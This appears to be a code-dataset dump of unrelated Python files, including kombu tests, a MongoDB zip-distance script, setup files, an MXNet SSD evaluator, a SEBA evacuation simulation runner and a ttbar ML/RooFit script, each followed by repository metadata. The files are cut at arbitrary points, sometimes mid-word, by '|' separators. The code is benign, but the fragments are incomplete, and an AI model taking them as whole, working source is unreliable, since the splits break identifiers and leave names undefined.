from kombu.five import python_2_unicode_compatible
from kombu.utils.text import version_string_as_tuple
from kombu.tests.case import Case, Mock, patch, mock
@python_2_unicode_compatible
class OldString(object):
def __init__(self, value):
self.value = value
def __str__(self):
return self.value
def split(self, *args, **kwargs):
return self.value.split(*args, **kwargs)
def rsplit(self, *args, **kwargs):
return self.value.rsplit(*args, **kwargs)
class test_kombu_module(Case):
def test_dir(self):
import kombu
self.assertTrue(dir(kombu))
class test_utils(Case):
def test_maybe_list(self):
self.assertEqual(utils.maybe_list(None), [])
self.assertEqual(utils.maybe_list(1), [1])
self.assertEqual(utils.maybe_list([1, 2, 3]), [1, 2, 3])
def test_fxrange_no_repeatlast(self):
self.assertEqual(list(utils.fxrange(1.0, 3.0, 1.0)),
[1.0, 2.0, 3.0])
def test_fxrangemax(self):
self.assertEqual(list(utils.fxrangemax(1.0, 3.0, 1.0, 30.0)),
[1.0, 2.0, 3.0, 3.0, 3.0, 3.0,
3.0, 3.0, 3.0, 3.0, 3.0])
self.assertEqual(list(utils.fxrangemax(1.0, None, 1.0, 30.0)),
[1.0, 2.0, 3.0, 4.0, 5.0, 6.0, 7.0])
def test_reprkwargs(self):
self.assertTrue(utils.reprkwargs({'foo': 'bar', 1: 2, 'k': 'v'}))
def test_reprcall(self):
self.assertTrue(
|
utils.reprcall('add', (2, 2), {'copy': True}),
)
class test_UUID(Case):
def test_uuid4(self):
self.assertNotEqual(utils.uuid4(),
utils.uuid4())
def test_uuid(self):
i1 = utils.uuid()
i2 = utils.uuid()
self.assertIsInstance(i1, str)
self.assertNotEqual(i1, i2)
class MyStringIO(StringIO):
def close(self):
pass
class MyBytesIO(BytesIO):
def close(self):
pass
class test_emergency_
|
dump_state(Case):
@mock.stdouts
def test_dump(self, stdout, stderr):
fh = MyBytesIO()
utils.emergency_dump_state(
{'foo': 'bar'}, open_file=lambda n, m: fh)
self.assertDictEqual(
pickle.loads(fh.getvalue()), {'foo': 'bar'})
self.assertTrue(stderr.getvalue())
self.assertFalse(stdout.getvalue())
@mock.stdouts
def test_dump_second_strategy(self, stdout, stderr):
fh = MyStringIO()
def raise_something(*args, **kwargs):
raise KeyError('foo')
utils.emergency_dump_state(
{'foo': 'bar'},
open_file=lambda n, m: fh, dump=raise_something
)
self.assertIn('foo', fh.getvalue())
self.assertIn('bar', fh.getvalue())
self.assertTrue(stderr.getvalue())
self.assertFalse(stdout.getvalue())
class test_retry_over_time(Case):
def setup(self):
self.index = 0
class Predicate(Exception):
pass
def myfun(self):
if self.index < 9:
raise self.Predicate()
return 42
def errback(self, exc, intervals, retries):
interval = next(intervals)
sleepvals = (None, 2.0, 4.0, 6.0, 8.0, 10.0, 12.0, 14.0, 16.0, 16.0)
self.index += 1
self.assertEqual(interval, sleepvals[self.index])
return interval
@mock.sleepdeprived(module=utils)
def test_simple(self):
prev_count, utils.count = utils.count, Mock()
try:
utils.count.return_value = list(range(1))
x = utils.retry_over_time(self.myfun, self.Predicate,
errback=None, interval_max=14)
self.assertIsNone(x)
utils.count.return_value = list(range(10))
cb = Mock()
x = utils.retry_over_time(self.myfun, self.Predicate,
errback=self.errback, callback=cb,
interval_max=14)
self.assertEqual(x, 42)
self.assertEqual(self.index, 9)
cb.assert_called_with()
finally:
utils.count = prev_count
@mock.sleepdeprived(module=utils)
def test_retry_once(self):
with self.assertRaises(self.Predicate):
utils.retry_over_time(
self.myfun, self.Predicate,
max_retries=1, errback=self.errback, interval_max=14,
)
self.assertEqual(self.index, 1)
# no errback
with self.assertRaises(self.Predicate):
utils.retry_over_time(
self.myfun, self.Predicate,
max_retries=1, errback=None, interval_max=14,
)
@mock.sleepdeprived(module=utils)
def test_retry_always(self):
Predicate = self.Predicate
class Fun(object):
def __init__(self):
self.calls = 0
def __call__(self, *args, **kwargs):
try:
if self.calls >= 10:
return 42
raise Predicate()
finally:
self.calls += 1
fun = Fun()
self.assertEqual(
utils.retry_over_time(
fun, self.Predicate,
max_retries=0, errback=None, interval_max=14,
),
42,
)
self.assertEqual(fun.calls, 11)
class test_cached_property(Case):
def test_deleting(self):
class X(object):
xx = False
@utils.cached_property
def foo(self):
return 42
@foo.deleter # noqa
def foo(self, value):
self.xx = value
x = X()
del(x.foo)
self.assertFalse(x.xx)
x.__dict__['foo'] = 'here'
del(x.foo)
self.assertEqual(x.xx, 'here')
def test_when_access_from_class(self):
class X(object):
xx = None
@utils.cached_property
def foo(self):
return 42
@foo.setter # noqa
def foo(self, value):
self.xx = 10
desc = X.__dict__['foo']
self.assertIs(X.foo, desc)
self.assertIs(desc.__get__(None), desc)
self.assertIs(desc.__set__(None, 1), desc)
self.assertIs(desc.__delete__(None), desc)
self.assertTrue(desc.setter(1))
x = X()
x.foo = 30
self.assertEqual(x.xx, 10)
del(x.foo)
class test_symbol_by_name(Case):
def test_instance_returns_instance(self):
instance = object()
self.assertIs(utils.symbol_by_name(instance), instance)
def test_returns_default(self):
default = object()
self.assertIs(
utils.symbol_by_name('xyz.ryx.qedoa.weq:foz', default=default),
default,
)
def test_no_default(self):
with self.assertRaises(ImportError):
utils.symbol_by_name('xyz.ryx.qedoa.weq:foz')
def test_imp_reraises_ValueError(self):
imp = Mock()
imp.side_effect = ValueError()
with self.assertRaises(ValueError):
utils.symbol_by_name('kombu.Connection', imp=imp)
def test_package(self):
from kombu.entity import Exchange
self.assertIs(
utils.symbol_by_name('.entity:Exchange', package='kombu'),
Exchange,
)
self.assertTrue(utils.symbol_by_name(':Consumer', package='kombu'))
class test_ChannelPromise(Case):
def test_repr(self):
obj = Mock(name='cb')
self.assertIn(
'promise',
repr(utils.ChannelPromise(obj)),
)
obj.assert_not_called()
class test_entrypoints(Case):
@mock.mask_modules('pkg_resources')
def test_without_pkg_resources(self):
self.assertListEqual(list(utils.entrypoints('kombu.test')), [])
@mock.module_exists('pkg_resources')
def test_with_pkg_resources(self):
with patch('pkg_resources.
|
rainmakeross/python-dataanalysis
|
app.py
|
Python
|
apache-2.0
| 871 | 0.005741 |
from mongoengine import *
from models.zips import Zips
from geopy import distance
from geopy import Point
connect('scratch', host='mongodb://142.133.150.180/scratch')
# zipins = Zips(zipcode=999999, city="testlocation", loc=[1.0,1.0],pop=12345, state="ZZ").save()
locationList = []
location = {}
distanceList = []
for zip in Zips.objects:
locationList.append(zip)
for location1 in locationList:
if location1.city=="BEVERLY HILLS" :
point1 = Point(location1.loc
|
[0], location1.loc[1])
for location2 in locationList:
if location1 != location2 and location2.city !="BEVERLY HILLS":
point2 = Point(location2.loc[0], location2.loc[1])
if(distance.distance(point1, point2) < 5):
distanceList.append(location2)
for location
|
in distanceList:
print (location.city, location.zipcode)
|
tzangms/iloveck101
|
setup.py
|
Python
|
mit
| 662 | 0.006042 |
from setuptools import setup
license = open('LICENSE.txt').read()
setup(
name='ilovec
|
k101',
version='0.5.2',
author='tzangms',
author_email='tzangms@gmail.com',
packages=['iloveck101'],
url='https://github.com/tzangms/iloveck101',
license=license,
description='Download images from ck101 thread',
test_suite='tests',
long_description=open('README.md').read(),
entry_points = {
'console_scripts': [
'iloveck101 = iloveck101.iloveck101:main',
]
},
install_requires = [
"lxml==3.2.4",
|
"requests==2.0.1",
"gevent==1.0",
"more-itertools==2.2",
],
)
|
JensTimmerman/radical.pilot
|
src/radical/pilot/__init__.py
|
Python
|
mit
| 1,882 | 0.020723 |
#pylint: disable=C0301, C0103, W0212, W0401
"""
.. module:: pilot
:platform: Unix
:synopsis: RADICAL-Pilot is a distributed Pilot-Job framework.
.. moduleauthor:: Ole Weidner <ole.weidner@rutgers.edu>
"""
__copyright__ = "Copyright 2013-2014, http://radical.rutgers.edu"
__license__ = "MIT"
# ------------------------------------------------------------------------------
# Scheduler name constant
from types import *
from states import *
from logentry import *
from scheduler import *
# ------------------------------------------------------------------------------
#
from url import Url
from exceptions import *
from session import Session
from context import Context
from unit_manager import UnitManager
from compute_unit import ComputeUnit
from compute_unit_description import ComputeUnitDescription
from pilot_manager import PilotManager
from compute_pilot import ComputePilot
from compute_pilot_description import ComputePilotDescription
from resource_config import ResourceConfig
from staging_directives import COPY, LINK, MOVE, TRANSFER, SKIP_FAILED, CREATE_PARENTS
# ------------------------------------------------------------------------------
#
from utils.logger import logger
import o
|
s
import radical.utils as ru
import radical.utils.logger as rul
pwd = os.path.dirname (__file__)
root = "%s/.." % pwd
version, version_detail, version_branch, sdist_name, sdist_path = ru.get_version ([root, pwd])
# FIXME: the logger init will require a 'classical' ini based config, which is
# different from the json based config we use now. May need updating once the
# radical configuration system has ch
|
anged to json
_logger = rul.logger.getLogger ('radical.pilot')
_logger.info ('radical.pilot version: %s' % version_detail)
# ------------------------------------------------------------------------------
|
GregHilmes/pokebase
|
tests/test_module_loaders.py
|
Python
|
bsd-3-clause
| 1,399 | 0.004289 |
# -*- coding: utf-8 -*-
import unittest
from unittest.mock import patch
from hypothesis import given
from hypothesis.strategies import integers
from pokebase import APIResource, loaders
from pokebase.common import ENDPOINTS
def builder(func, func_name):
@given(id_=integers(min_value=1))
@patch('pokebase.interface.get_data')
def test(self, mock_get_data, id_):
mock_get_data.side_effect = [{'count': 1, 'results': [{'url': 'mocked.url/api/v2/{}/{}/'.format(func_name, id_)}]},
{'simple_attr': 10, 'list_attr': [{'name': 'mocked name'}], 'complex_attr': {'url': 'mocked.url/api/v2/{}/{}/'.format(func_name, 10)}},
{'count': 1, 'results': [{'url': 'mocked.url/api/v2/{}/{}/'.format(func_name, id_)}]}]
self.assertIsInstance(func(id_), APIResource)
return test
class TestFunctions_loaders(unittest.TestCase):
@classmethod
def setUpClass(cls):
for endpoint in ENDPOINTS:
if endpoint in ['type']:
# special cases, need trailing underscore
func_name = ''.join([endpoint.replace('-', '_'), '_'])
else:
|
func_name = endpoint.replace('-', '_'
|
)
func = getattr(loaders, func_name)
setattr(cls, 'testLoader_{}'.format(func_name), builder(func, endpoint))
TestFunctions_loaders.setUpClass()
|
zhreshold/mxnet-ssd
|
evaluate/evaluate_net.py
|
Python
|
mit
| 3,901 | 0.003076 |
from __future__ import print_function
import os
import sys
import importlib
import mxnet as mx
from dataset.iterator import DetRecordIter
from config.config import cfg
from evaluate.eval_metric import MApMetric, VOC07MApMetric
import logging
from symbol.symbol_factory import get_symbol
def evaluate_net(net, path_imgrec, num_classes, mean_pixels, data_shape,
model_prefix, epoch, ctx=mx.cpu(), batch_size=1,
path_imglist="", nms_thresh=0.45, force_nms=False,
ovp_thresh=0.5, use_difficult=False, class_names=None,
voc07_metric=False, frequent=20):
"""
evalute network given validation record file
Parameters:
----------
net : str or None
Network name or use None to load from json without modifying
path_imgrec : str
path to the record validation file
path_imglist : str
path to the list file to replace labels in record file, optional
num_classes : int
number of classes, not including background
mean_pixels : tuple
(mean_r, mean_g, mean_b)
data_shape : tuple or int
(3, height, width) or height/width
model_prefix : str
model prefix of saved checkpoint
epoch : int
load model epoch
ctx : mx.ctx
mx.gpu() or mx.cpu()
batch_size : int
validation batch size
nms_thresh : float
non-maximum suppression threshold
force_nms : boolean
whether suppress different class objects
ovp_thresh : float
AP overlap threshold for true/false postives
use_difficult : boolean
whether to use difficult objects in evaluation if applicable
class_names : comma separated str
class names in string, must correspond to num_classes if set
voc07_metric : boolean
whether to use 11-point evluation as in VOC07 competition
frequent : int
frequency to print out validation status
"""
# set up logger
logging.basicConfig()
logger = logging.getLogger()
logger.setLevel(logging.INFO)
# args
if isinstance(data_shape, int):
data_shape = (3, data_shape, data_shape)
assert len(data_shape) == 3 and data_shape[0] == 3
#model_prefix += '_' + str(data_shape[1])
# iterator
eval_iter = DetRecordIter(path_imgrec, batch_size, data_shape,
path_imglist=path_imglist, **cfg.valid)
# model params
load_net, args, auxs = mx.model.load_checkpoint(model_prefix, epoch)
# network
if net is None:
net = load_net
else:
|
net = get_symbol(net, data_shape[1], num_classes=num_classes,
nms_thresh=nms_thresh, force_suppress=force_nms)
if not 'label' in net.list_arguments():
label = mx.sym.Variable(name='label')
net = mx.sym.Group([net, label])
# init module
mod = mx.mod.Module(net, la
|
bel_names=('label',), logger=logger, context=ctx,
fixed_param_names=net.list_arguments())
mod.bind(data_shapes=eval_iter.provide_data, label_shapes=eval_iter.provide_label)
mod.set_params(args, auxs, allow_missing=False, force_init=True)
# run evaluation
if voc07_metric:
metric = VOC07MApMetric(ovp_thresh, use_difficult, class_names,
roc_output_path=os.path.join(os.path.dirname(model_prefix), 'roc'))
else:
metric = MApMetric(ovp_thresh, use_difficult, class_names,
roc_output_path=os.path.join(os.path.dirname(model_prefix), 'roc'))
results = mod.score(eval_iter, metric, num_batch=None,
batch_end_callback=mx.callback.Speedometer(batch_size,
frequent=frequent,
auto_reset=False))
for k, v in results:
print("{}: {}".format(k, v))
|
ucoin-io/cutecoin
|
update_ts.py
|
Python
|
mit
| 1,724 | 0.00174 |
import sys, os, multiprocessing, subprocess, time
src = os.path.abspath(os.path.join(os.path.dirname(__file__), 'src', 'sakia'))
res = os.path.abspath(os.path.join(os.path.dirname(__file__), 'res'))
pro_file_template = """
FORMS = {0}
SOURCES = {1}
TRANSLATIONS = {2}
"""
def generate_pro():
sources = []
forms = []
translations = []
project_filename = os.path.abspath(os.path.join(
os.path.dirname(__file__),
"sakia-ts-{0}".format(int(time.time()))))
for root, dirs, files in os.walk(src):
for f in files:
if f.endswith('.py') and not f.ends
|
with('_uic.py'):
sources.append(os.path.join(root, f))
else:
continue
print(os.path.join(root, f))
for root, dirs, files in os.walk(res):
for f in files:
if f.endswith('.ui'):
forms.append(os.path.join(root, f))
elif f.endswith('.ts'):
translations.append(os.path.join(root, f))
else:
|
continue
print(os.path.join(root, f))
with open(project_filename, 'w') as outfile:
outfile.write(pro_file_template.format(""" \\
""".join(forms),
""" \\
""".join(sources),
""" \\
""".join(translations)))
return project_filename
pro_file = generate_pro()
try:
if "-noobsolete" in sys.argv:
print("Removing obsolete strings...")
subprocess.call(["pylupdate5", "-noobsolete", pro_file])
else:
subprocess.call(["pylupdate5", pro_file])
finally:
os.remove(pro_file)
|
gsi-upm/soba
|
projects/seba/run.py
|
Python
|
mit
| 3,404 | 0.016745 |
from soba.models.continuousModel import ContinuousModel
import soba.visualization.ramen.mapGenerator as ramen
import soba.run
from collections import OrderedDict
import json
from time import time
import sys
from model import SEBAModel
from visualization.back import Visualization
import datetime as dt
aStar = False
strategies = ['nearest', 'safest', 'uncrowded']
# Simulation configuration
today = dt.date.today()
timeHazard = "10:30:00"
#Only two are neccesary
families = [{'N': 4, 'child': 2, 'adult': 2}]
sebaConfiguration = {'familie
|
s': [], 'hazard': tim
|
eHazard}
# Occupancy atributtes
jsonsOccupants = []
strategy = strategies[0]
N = 40
NDis = 0
fov = True
speed = 1.38
speedDis = 0.7
#states = OrderedDict([('Free time','out'), ('Rest', 'wp'), ('Lunch','out'), ('Work', 'wp')])
states = OrderedDict([('Free time','out'), ('Lunch','out'), ('Work', 'wp')])
schedule = {'t1': "09:00:00", 't2': "10:00:00", 't3': "11:00:00", 't4': "18:00:00"}
variation = {'t1': "00:50:00", 't2': "00:30:00", 't3': "00:30:00", 't4': "00:59:00"}
markovActivity = {
'-t1': [[100, 0, 0], [100, 0, 0], [100, 0, 0], [100, 0, 0]],
't1-t2': [[0, 0, 70], [0, 0, 90], [0, 0, 80], [0, 0, 60]],
't2-t3': [[100, 0, 0], [0, 20, 60], [20, 50, 40], [0, 70, 30]],
't3-t4': [[100, 0, 0], [0, 20, 60], [0, 0, 70], [20, 0, 70]],
't4-': [[100, 0, 0], [70, 0, 30], [70, 0, 30], [70, 0, 30]]
}
timeActivity = {
'-t1': [3, 0, 0], 't1-t2': [0, 0, 45], 't2-t3': [0, 50, 45], 't3-t4': [0, 20, 45], 't4-': [3, 10, 20]
}
timeActivityVariation = {
'-t1': [0, 0, 0], 't1-t2': [0, 0, 10], 't2-t3': [0, 10, 10], 't3-t4': [0, 5, 10], 't4-': [0,5, 10]
}
jsonOccupant = {'type': 'regular' , 'astar': aStar, 'N': N, 'states': states , 'schedule': schedule, 'variation': variation,
'markovActivity': markovActivity, 'timeActivity': timeActivity, 'timeActivityVariation': timeActivityVariation,
'strategy': strategy, 'speedEmergency': speed, 'shape': 'rect', 'fov': fov}
jsonsOccupants.append(jsonOccupant)
jsonOccupantDis = {'type': 'dis' , 'astar': aStar, 'N': NDis, 'states': states , 'schedule': schedule, 'variation': variation,
'markovActivity': markovActivity, 'timeActivity': timeActivity, 'timeActivityVariation': timeActivityVariation,
'strategy': strategy, 'speedEmergency': speedDis, 'fov': fov}
jsonsOccupants.append(jsonOccupantDis)
#with open('auxiliarFiles/labgsi.blueprint3d') as data_file:
# jsonMap = ramen.returnMap(data_file, offsety = 9, offsetx = 0)
#cellW = 20
#cellH = 20
#with open('auxiliarFiles/uclm_furniture1_new.blueprint3d') as data_file:
#jsonMap = ramen.returnMap(data_file, offsety = 21, offsetx = 0)
#cellW = 113
#cellH = 80
with open('auxiliarFiles/uclm_furniture2_new.blueprint3d') as data_file:
jsonMap = ramen.returnMap(data_file, offsety = 21, offsetx = 0)
cellW = 113
cellH = 80
if len(sys.argv) > 1 and sys.argv[1] == '-v':
back = Visualization(cellW, cellH)
parameters = {'width': cellW, 'height': cellH, 'jsonMap': jsonMap, 'jsonsOccupants': jsonsOccupants, 'sebaConfiguration': sebaConfiguration}
soba.run.run(SEBAModel, parameters, visualJS="visualization/front.js", back=back)
else:
fixed_params = {"width": cellW, "height": cellH, "jsonMap": jsonMap, "jsonsOccupants": jsonsOccupants, 'sebaConfiguration': sebaConfiguration}
variable_params = {"seed": range(10, 500, 10)}
soba.run.run(SEBAModel, fixed_params, variable_params)
|
webgovernor/gitgate
|
setup.py
|
Python
|
mit
| 856 | 0.031542 |
#!/usr/bin/env python
"""
Copyright (c) 2012, Aaron Meier
All rights reserved.
See LICENSE for more information.
"""
from distutils.core import setup
import os
from gitgate import __version__
setup(name='gitgate',
version = __version__,
description = 'Dead simple gatekeeping code review for Git',
long_description = (
"GitGate provides a GUI frontend (via Flask) for pre-merge code review."
),
author = 'Aaron Meier',
author_email = 'webgovernor@gmail.com',
packages = ['gitgate'],
package_d
|
ir={'gitgate':'gitgate'},
package_data={'gitgate':['templates/*', 'static/bootstrap3/*/*', 'static/jquery/*.js']},
scripts=['gitgate/scripts/gitgate'],
url = 'http://gitgate.nullism.com',
install_requires = ['peewe
|
e>=2.2.3', 'flask>=0.9', 'argparse>=1'],
license = 'MIT',
provides = ['gitgate']
)
|
et-al-Health/parserator
|
parserator/spotcheck.py
|
Python
|
mit
| 3,434 | 0.004659 |
#!/usr/bin/python
# -*- coding: utf-8 -*-
from __future__ import print_function
from builtins import zip
import pycrfsuite
def compareTaggers(model1, model2, string_list, module_name):
"""
Compare two models. Given a list of strings, prints out tokens & tags
whenever the two taggers parse a string differently. This is for spot-checking models
:param tagger1: a .crfsuite filename
:param tagger2: another .crfsuite filename
:param string_list: a list of strings to be checked
:param module_name: name of a parser module
"""
module = __import__(module_name)
tagger1 = pycrfsuite.Tagger()
tagger1.open(module_name+'/'+model1)
tagger2 = pycrfsuite.Tagger()
tagger2.open(module_name+'/'+model2)
count_discrepancies = 0
for string in string_list:
tokens = module.tokenize(string)
if tokens:
features = module.tokens2features(tokens)
tags1 = tagger1.tag(features)
tags2 = tagger2.tag(features)
if tags1 != tags2:
count_discrepancies += 1
print('\n')
print("%s. %s" %(count_discrepancies, string))
print('-'*75)
print_spaced('token', model1, model2)
print('-'*75)
for token in zip(tokens, tags1, tags2):
print_spaced(token[0], token[1], token[2])
print("\n\n%s of %s strings were labeled differently"%(count_discrepancies, len(string_list)))
def print_spaced(s1, s2, s3):
n = 25
print(s1 + " "*(n-len(s1)) + s2 + " "*(n-len(s2)) + s3)
def validateTaggers(model1, model2, labeled_string_list, module_name):
module = __import__(module_name)
tagger1 = pycrfsuite.Tagger()
tagger1.open(module_name+'/'+model1)
tagger2 = pycrfsuite.Tagger()
tagger2.open(module_name+'/'+model2)
wrong_count_1 = 0
wrong_count_2 = 0
wrong_count_both = 0
correct_count = 0
for labeled_string in labeled_string_list:
unlabeled_string, components = labeled_string
tokens = module.tokenize(unlabeled_string)
if tokens:
features = module.tokens2features(tokens)
_, tags_true = list(zip(*components))
tags_true = list(tags_true)
tags1 = tagger1.tag(features)
tags2 = tagger2.tag(features)
if (tags1 != tags_true) and (tags2 != tags_true):
print("\nSTRING: ", unlabeled_string)
print("TRUE: ", tags_true)
print("*%s: "%model1, tags1)
print("*%s: "%model2, tags2)
wrong_count_both += 1
elif (tags1 != tags_true):
print("\nSTRING: ", unlabeled_string)
print("TRUE: ", tags_true)
|
print("*%s: "%model1, tags1)
print("%s: "%model2, tags2)
wrong_count_1 += 1
elif (tags2 != tags_true):
print("\nSTRING: ", unlabeled_string)
print("TRUE: ", tags_true)
print("%s: "%model1, tags1)
prin
|
t("*%s: "%model2, tags2)
wrong_count_2 += 1
else:
correct_count += 1
print("\n\nBOTH WRONG: ", wrong_count_both)
print("%s WRONG: %s" %(model1, wrong_count_1))
print("%s WRONG: %s" %(model2, wrong_count_2))
print("BOTH CORRECT: ", correct_count)
|
ftl/dxpad
|
tests/test_contest.py
|
Python
|
mit
| 3,821 | 0.001309 |
#! /usr/bin/env python3
# -*- coding: utf-8 -*-
import sys
import os
import unittest
sys.path.insert(0, os.path.abspath('..'))
import dxpad._contest as _contest
class SignalMonitor:
signal_received = False
signal_value = None
def __init__(self, signal):
signal.connect(self.signal_receiver)
def signal_receiver(self, value = None):
self.signal_received = True
self.signal_value = value
class TestCurrentQso(unittest.TestCase):
def test_create(self):
qso = _contest.CurrentQso(_contest.Exchange())
def test_next_increases_serial(self):
qso = _contest.CurrentQso(_contest.Exchange())
qso.next()
self.assertEqual(qso.serial, 2)
def test_next_updates_exchange_out(self):
exchange = _contest.SerialExchange()
qso = _contest.CurrentQso(exchange)
qso.serial = 123
qso.next()
self.assertEqual(exchange.serial, 124)
def test_next_clears_inputs(self):
qso = _contest.CurrentQso(_contest.SerialExchange())
qso.call = "the call"
qso.exchange_in = "the exchange in"
qso.call_valid = True
qso.exchange_in_valid = True
qso.complete = True
qso.next()
self.assertEqual(qso.call, "")
self.assertEqual(qso.exchange_in, "")
self.assertFalse(qso.call_valid)
self.assertFalse(qso.exchange_in_valid)
self.assertFalse(qso.complete)
def test_next_emits_changed_invalid_and_incomplete(self):
qso = _contest.CurrentQso(_contest.SerialExchange())
qso.call_valid = True
qso.exchange_in_valid = True
qso.complete = True
monitor_changed = SignalMonitor(qso.changed)
monitor_call = SignalMonitor(qso.call_is_valid)
monitor_exchange_in = SignalMonitor(qso.exchange_in_is_valid)
monitor_complete = SignalMonitor(qso.completed)
qso.next()
self.assertTrue(monitor_changed.signal_received)
self.assertTrue(monitor_call.signal_received)
self.assertFalse(monitor_call.signal_value)
self.assertTrue(monitor_exchange_in.signal_received)
self.assertFalse(monitor_exchange_in.signal_value)
self.assertTrue(monitor_complete.signal_received)
self.assertFalse(monitor_complete.signal_value)
def test_set_call_valid_emits_call_is_valid(self):
qso = _contest.CurrentQso(_contest.Exchange())
monitor = SignalMonitor(qso.call_is_valid)
qso.set_call("N1")
|
self.assertFalse(monitor.signal_received)
qso.set_call("N1MM")
self.assertTrue(monitor.signal_received)
self.assertTrue(monitor.signal_value)
def test_set_exchange_in_valid_emits_exchange_in_is_valid(self):
|
qso = _contest.CurrentQso(_contest.Exchange())
monitor = SignalMonitor(qso.exchange_in_is_valid)
qso.set_exchange_in("1")
self.assertTrue(monitor.signal_received)
self.assertTrue(monitor.signal_value)
class TestSerialExchange(unittest.TestCase):
def test_str_padding_with_zeros(self):
exchange = _contest.SerialExchange()
self.assertEqual(str(exchange), "599001")
def test_str_padding_only_to_three_digits(self):
exchange = _contest.SerialExchange()
exchange.serial = 1000
self.assertEqual(str(exchange), "5991000")
def test_next_uses_serial_of_qso(self):
exchange = _contest.SerialExchange()
qso = _contest.CurrentQso(exchange)
qso.serial = 123
exchange.next(qso)
self.assertEqual(exchange.serial, 123)
def test_next_emits_changed(self):
exchange = _contest.SerialExchange()
monitor = SignalMonitor(exchange.changed)
exchange.next(_contest.CurrentQso(exchange))
self.assertTrue(monitor.signal_received)
|
cranmer/parametrized-learning
|
ttbar_resonance.py
|
Python
|
bsd-2-clause
| 11,616 | 0.037965 |
#!/usr/bin/env python
# https://github.com/svenkreiss/PyROOTUtils/blob/master/PyROOTUtils/Graph.py
__author__ = "Kyle Cranmer <kyle.cranmer@nyu.edu"
__version__ = "0.1"
'''
This is a research work in progress.
Define model mu_s*Gaus(x|alpha,sigma)+mu_b*flat(x)
Generate {x} for several {alpha}
Calculate power (expected significance) for some alpha using profile likelihood approach
1) Train NN for alpha=0.
1a) make (histfactory/on the fly) model for NN with alpha variations
- calculate power
1b) make pdf on the fly for each value of alpha
2) Train NN with {x,alpha}
a) make histfactory model for NN with alpha variations using same alpha as input to NN
- calculate power
b) make pdf on the fly for NN with alpha variations using same alpha as input to NN
- calculate power
'''
import ROOT
import numpy as np
from sklearn import svm, linear_model, gaussian_process
from sklearn.neural_network import BernoulliRBM
from sklearn.ensemble import AdaBoostClassifier
from sklearn.tree import DecisionTreeClassifier
from sklearn.externals import joblib
import matplotlib.pyplot as plt
import os.path
def createdPdfForFixed():
'''
Read in learner saved in fixed.pkl
Evaluate outputs for several parameter points.
Generate histograms for each point.
(to do: create parametrized pdf that interpolates across these pdfs)
'''
clf = joblib.load('fixed.pkl')
trainAndTarget = np.loadtxt('traindata.dat')
traindata = trainAndTarget[:,0:2]
targetdata = trainAndTarget[:,2]
massPoints = np.unique(traindata[:,1])
fixedhists=[]
c1 = ROOT.TCanvas()
for j, name in enumerate(['sig','bkg']):
for i, mass in enumerate(massPoints):
#bkg part
#plt.hist(outputs[i*chunk+shift: \
# (i+1)*chunk+shift], 30, alpha=0.3)
#sig part
hist = ROOT.TH1F('h{0}hist{1}'.format(name,i),"hist",30,-0.1,1.2)
fixedhists.append(hist)
for val in outputs[i*chunk+j*shift: (i+1)*chunk+j*shift]:
hist.Fill(val)
if i==0:
hist.Draw()
else:
hist.Draw('same')
c1.SaveAs('roothists.pdf')
def createPdfForAdaptive_tree(tree):
'''
Read in learner saved in adaptive.pkl
Evaluate outputs for several parameter points, using true value for parameter
Generate histograms for each point.
create parametrized pdf that interpolates across these pdfs
'''
bins=30
low=0.
high=1.
# loop over the tree, build histograms of output for target=(0,1), different mx values
i=0
var_points = [ [] , [] ]
adaptivehists = [ [] , [] ]
while (tree.GetEntry(i)):
# have we seen this mx before?
try:
# if so, get the index
ind = var_points[int(tree.target)].index(tree.mx)
except ValueError:
# if no, add to our list and make a histogram for it, then get the index
var_points[int(tree.target)].append(tree.mx)
ind = var_points[int(tree.target)].index(tree.mx)
hist = ROOT.TH1F('h{0}hist{1}'.format(int(tree.target),ind),"hist",bins,low,high)
adaptivehists[int(tree.target)].append(hist)
# if (i%1000==0):
# print ' entry ', i , ' mx = ', tree.mx, ' target = ', tree.target, ' ind = ',ind,var_points[0],var_points[1]
# fill the histogram
adaptivehists[int(tree.target)][ind].Fill(tree.MLP)
i=i+1
# sort them by the var_points
for target in 0,1:
var_points[target], adaptivehists[target] = zip(*sorted(zip(var_points[target],adaptivehists[target])))
print var_points
print adaptivehists
# build Ro
|
oWorld stuff
w = ROOT.RooWorkspace('w')
w.factory('mx[{0},{1}]'.format( var_points[0][0],var_points[0][len(var_points[0])-1]))
w.factory('score[{0},{1}]'.format(low,high))
s = w.var('score')
|
mu = w.var('mx')
adpativedatahists=[[],[]]
adpativehistpdfs=[[],[]]
for target in 0,1:
for ind in range(0,len(var_points[target])):
print "Building RooWorld stuff for target",target," index ",ind
print " mx = ", var_points[target][ind], " mean = ", adaptivehists[target][ind].GetMean(), " rms = ", adaptivehists[target][ind].GetRMS()
datahist = ROOT.RooDataHist('dh{0}datahist{1}'.format(target,ind),"hist",
ROOT.RooArgList(s), adaptivehists[target][ind])
order=1
s.setBins(bins)
histpdf = ROOT.RooHistPdf('hp{0}histpdf{1}'.format(target,ind),"hist",
ROOT.RooArgSet(s), datahist,order)
histpdf.specialIntegratorConfig(ROOT.kTRUE).method1D().setLabel('RooBinIntegrator')
getattr(w,'import')(datahist) # work around for morph = w.import(morph)
getattr(w,'import')(histpdf) # work around for morph = w.import(morph)
adpativedatahists[target].append(datahist)
adpativehistpdfs[target].append(histpdf)
w = makeBSpline(w,mu,s,adpativehistpdfs[target], var_points[target], 'm{0}morph'.format(target))
morph = w.pdf('m{0}morph'.format(target))
morph.specialIntegratorConfig(ROOT.kTRUE).method1D().setLabel('RooBinIntegrator')
print morph
# make dataset, add to workspace
w.factory('mwwbb[500,7000]')
w.factory('mx[350,1600]')
w.factory('target[-1,2]')
w.defineSet('inputvars','mwwbb,mx')
w.defineSet('treevars','mwwbb,mx,target')
w.defineSet('obsvars','mwwbb')
alldata = ROOT.RooDataSet('alldata','',tree, w.set('treevars'))
alldata.Print()
toydata = alldata.reduce(ROOT.RooFit.Cut('mx==1000.'))
toydata.Print()
obsdata = toydata.reduce(ROOT.RooFit.SelectVars(w.set('obsvars')))
obsdata.Print()
obsdata = ROOT.RooDataSet('obsdata','',tree, w.set('obsvars'))
getattr(w,'import')(alldata)
getattr(w,'import')(obsdata)
w.Print()
w.writeToFile("workspace_adaptive_tree.root")
def createPdfForAdaptive():
f = ROOT.TFile("ttbar_14tev_jes1_eval.root")
nt = f.Get("nto")
createPdfForAdaptive_tree(nt)
def plotScore():
ROOT.gSystem.Load( 'TMVAWrapper/libTMVAWrapper' )
ROOT.gROOT.ProcessLine(".L RooBSplineBases.cxx+")
ROOT.gROOT.ProcessLine(".L RooBSpline.cxx+")
f = ROOT.TFile('workspace_adaptive_tree.root','r')
w = f.Get('w')
